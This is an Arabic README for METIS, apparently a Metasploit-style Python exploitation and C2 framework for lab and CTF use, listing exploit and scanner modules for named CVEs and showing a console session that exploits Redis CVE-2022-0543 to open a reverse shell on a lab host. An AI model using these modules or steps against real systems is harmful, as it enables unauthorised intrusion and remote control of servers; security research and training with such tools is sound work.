إطار استغلال Python معياري مع وحدة تحكم بنمط Metasploit، ووحدات Exploit وAuxiliary ذاتية التسجيل، وفحوصات ثلاثية الحالات، ووسائل نقل جلسات متعددة لأهداف المختبر وCTF.
███╗ ███╗███████╗████████╗██╗███████╗
████╗ ████║██╔════╝╚══██╔══╝██║██╔════╝
██╔████╔██║█████╗ ██║ ██║███████╗
██║╚██╔╝██║██╔══╝ ██║ ██║╚════██║
██║ ╚═╝ ██║███████╗ ██║ ██║███████║
╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═╝╚══════╝
إطار استغلال بلغة Python مبني لأغراض التعلم. بنية معيارية، وطرفية ذات سمات، وناقلات جلسات متعددة، ومكتبة متنامية من وحدات CVE.
METIS هو إطار بحث أمني مدفوع من المجتمع. الهدف هو بناء مجموعة متنامية من الوحدات التي يساهم بها الباحثون الأمنيون والمطورون والمجتمع الأوسع.
هل لديك ماسح ضوئي مفيد، أو وحدة مساعدة، أو وحدة استغلال، أو أدوات بحث أمني أخرى ترغب في مشاركتها؟ أضفها إلى METIS وافتح طلب سحب (Pull Request).
جميع المساهمات مرحب بها، بشرط أن تتبع بنية الوحدات الخاصة بالمشروع، ومعايير الترميز، وإرشادات الاستخدام المصرح به.
سواء كنت تضيف وحدة CVE جديدة، أو تحسّن وحدة موجودة، أو تصلح خطأً، أو تبني وظائف إطار جديدة، فإن مساهماتك يمكن أن تساعد في جعل METIS أفضل للجميع.
راجع كتابة الوحدات أدناه للحصول على معلومات حول إنشاء وحدتك الخاصة.
METIS هو إطار C2/استغلال معياري مكتوب بلغة Python. يشغّل طرفية تفاعلية بأسلوب Metasploit حيث تختار الوحدات، وتضبط الخيارات، وتشغّل الفحوصات، وتحصل على جلسات ضد أهداف المختبر.
إنه مصمم من أجل:
إنه ليس مصممًا من أجل:
.py في modules/ وسيتم تسجيله تلقائيًاExploit (ينشئ جلسات) و Auxiliary (ماسحات ضوئية، عدّادات)check() ثلاثي الحالات — يمكن لكل وحدة التحقق قبل الهجوم (VULNERABLE / SAFE / UNKNOWN)file: مع أشرطة تقدم مباشرةKEY=VALUE| الوحدة | الوصف |
|---|---|
auxiliary/scanner/tcp_connect | ماسح ضوئي لمنافذ TCP متعدد الخيوط |
auxiliary/scanner/hikvision_cve_2017_7921 | تجاوز مصادقة كاميرا Hikvision IP + تعداد المستخدمين |
auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847 | تسريب بيانات اعتماد MikroTik WinBox |
auxiliary/scanner/redis_cve_2022_0543 | كاشف الهروب من صندوق رمل Lua في Redis |
| الوحدة | نوع الجلسة |
|---|---|
exploit/unix/ftp/vsftpd_234_backdoor | مأخذ ربط |
exploit/multi/http/ghost_cms_handlebars_rce | مأخذ عكسي |
exploit/multi/http/langflow_rce_cve_2026_9198 | مأخذ عكسي |
exploit/multi/http/budibase_plugin_upload_rce_cve_2026_31816 | مأخذ عكسي |
exploit/multi/http/activemq_jolokia_rce_cve_2026_34197 | مأخذ عكسي |
exploit/multi/http/tomcat_put_rce_cve_2017_12615 | مأخذ عكسي |
exploit/multi/http/joomla_jce_rce_cve_2026_48907 | webshell HTTP |
exploit/linux/http/freepbx_sqli_rce_cve_2025_57819 | عكسي متأخر (cron) |
exploit/linux/redis/redis_cve_2022_0543_rce | مأخذ عكسي |
exploit/linux/ssh/libssh_auth_bypass_cve_2018_10933 | قناة Paramiko |
exploit/linux/telnet/inetutils_telnetd_bypass_cve_2026_24061 | مأخذ telnet خام |
يتطلب Python 3.10+ و git.
git clone https://github.com/K3ysTr0K3R/METIS.git
cd METIS
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
requirements.txt:
pwntools>=4.11.0
requests>=2.31.0
paramiko>=3.0.0
redis>=5.0.0
cryptography>=42.0.0
rich>=13.7.0
prompt_toolkit>=3.0.43
التشغيل:
python3 metis.py
metis > show modules
# Module Date Rank Chk Description
-- ------------------------------------------------------------ ---------- --------- --- -----------
1 auxiliary/scanner/hikvision_cve_2017_7921 2017-09-23 normal Yes Hikvision IP Camera Authentication Bypass (CVE-2017-7921)
2 auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847 2018-08-01 great Yes MikroTik WinBox Credential Leak (CVE-2018-14847)
...
15 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent Yes vsftpd 2.3.4 Backdoor Command Execution
metis > search redis
# Module Date Rank Chk Description
-- ------ ---- ---- --- -----------
1 auxiliary/scanner/redis_cve_2022_0543 2022-02-18 excellent Yes Redis CVE-2022-0543 Scanner
2 exploit/linux/redis/redis_cve_2022_0543_rce 2022-02-18 excellent Yes Redis CVE-2022-0543 Lua Sandbox Escape RCE
metis > use 2
[*] using exploit/linux/redis/redis_cve_2022_0543_rce
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set RHOST 192.168.56.101
[+] RHOST => 192.168.56.101
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set LHOST 192.168.56.1
[+] LHOST => 192.168.56.1
metis exploit(linux/redis/redis_cve_2022_0543_rce) > check
[*] check: probing 192.168.56.101:6379
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[*] check -> vulnerable
metis exploit(linux/redis/redis_cve_2022_0543_rce) > exploit
[*] running check() before exploit (AUTOCHECK=true)
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[+] target appears vulnerable — proceeding
[*] listening on 192.168.56.1:4444 for reverse shell
[+] shell from 192.168.56.101:51234
[+] new session: <Session a3f2b1c4 192.168.56.101:51234>
metis exploit(linux/redis/redis_cve_2022_0543_rce) > sessions
a3f2b1c4 192.168.56.101:51234 (alive)
metis exploit(linux/redis/redis_cve_2022_0543_rce) > interact a3f2b1c4
[*] interacting with a3f2b1c4. 'background' returns, '!cmd' runs locally.
a3f2b1c4 $ id
uid=105(redis) gid=108(redis) groups=108(redis)
a3f2b1c4 $ background
metis >